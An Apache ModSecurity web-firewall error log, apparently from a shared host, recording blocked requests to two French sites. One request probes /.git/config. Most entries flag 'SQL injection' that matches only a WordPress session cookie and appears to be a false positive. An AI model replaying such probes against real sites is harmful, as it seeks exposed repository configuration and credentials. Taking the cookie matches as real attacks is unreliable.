[Mon May 11 18:35:55.304014 2026] [security2:error] [pid 1412074:tid 1412085] [client 34.130.34.214:33840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agIFazJnyuKVXoStDhbjeAAAAEk"]
[Mon May 11 18:35:55.473466 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFaw-Qm4vhlWBPlMjnWgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:55.473751 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFaw-Qm4vhlWBPlMjnWgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:56.051507 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFaw-Qm4vhlWBPlMjnWgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:56.197211 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFbA-Qm4vhlWBPlMjnWwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:56.197488 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFbA-Qm4vhlWBPlMjnWwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:56.775342 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFbA-Qm4vhlWBPlMjnWwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:56.899431 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFbA-Qm4vhlWBPlMjnXAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:56.899731 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFbA-Qm4vhlWBPlMjnXAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:57.058083 2026] [security2:error] [pid 1412074:tid 1412085] [client 34.130.34.214:33840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIFazJnyuKVXoStDhbjeAAAAEk"]
[Mon May 11 18:35:57.265715 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFbA-Qm4vhlWBPlMjnXAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:57.595213 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFbQ-Qm4vhlWBPlMjnXgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:57.595493 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFbQ-Qm4vhlWBPlMjnXgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:58.199747 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFbQ-Qm4vhlWBPlMjnXgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:58.458925 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFbg-Qm4vhlWBPlMjnXwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:58.459216 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFbg-Qm4vhlWBPlMjnXwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:59.059239 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFbg-Qm4vhlWBPlMjnXwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:00.016772 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFcA-Qm4vhlWBPlMjnYQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:00.017190 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFcA-Qm4vhlWBPlMjnYQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:00.621107 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFcA-Qm4vhlWBPlMjnYQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:01.063453 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFcQ-Qm4vhlWBPlMjnYgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:01.063739 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFcQ-Qm4vhlWBPlMjnYgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:01.635473 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFcQ-Qm4vhlWBPlMjnYgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:01.769818 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFcQ-Qm4vhlWBPlMjnZAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:01.770269 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFcQ-Qm4vhlWBPlMjnZAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:02.346011 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFcQ-Qm4vhlWBPlMjnZAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:02.466771 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFcg-Qm4vhlWBPlMjnZQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:02.467070 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFcg-Qm4vhlWBPlMjnZQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:02.847210 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFcg-Qm4vhlWBPlMjnZQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:03.860254 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFcw-Qm4vhlWBPlMjnZwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:03.860535 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFcw-Qm4vhlWBPlMjnZwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:04.496486 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFcw-Qm4vhlWBPlMjnZwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:04.933539 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFdA-Qm4vhlWBPlMjnaAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:04.933813 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFdA-Qm4vhlWBPlMjnaAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:05.534338 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFdA-Qm4vhlWBPlMjnaAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:05.867513 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFdQ-Qm4vhlWBPlMjnagAAAAc"], referer: https://rentparadise.fr/wp-login.php
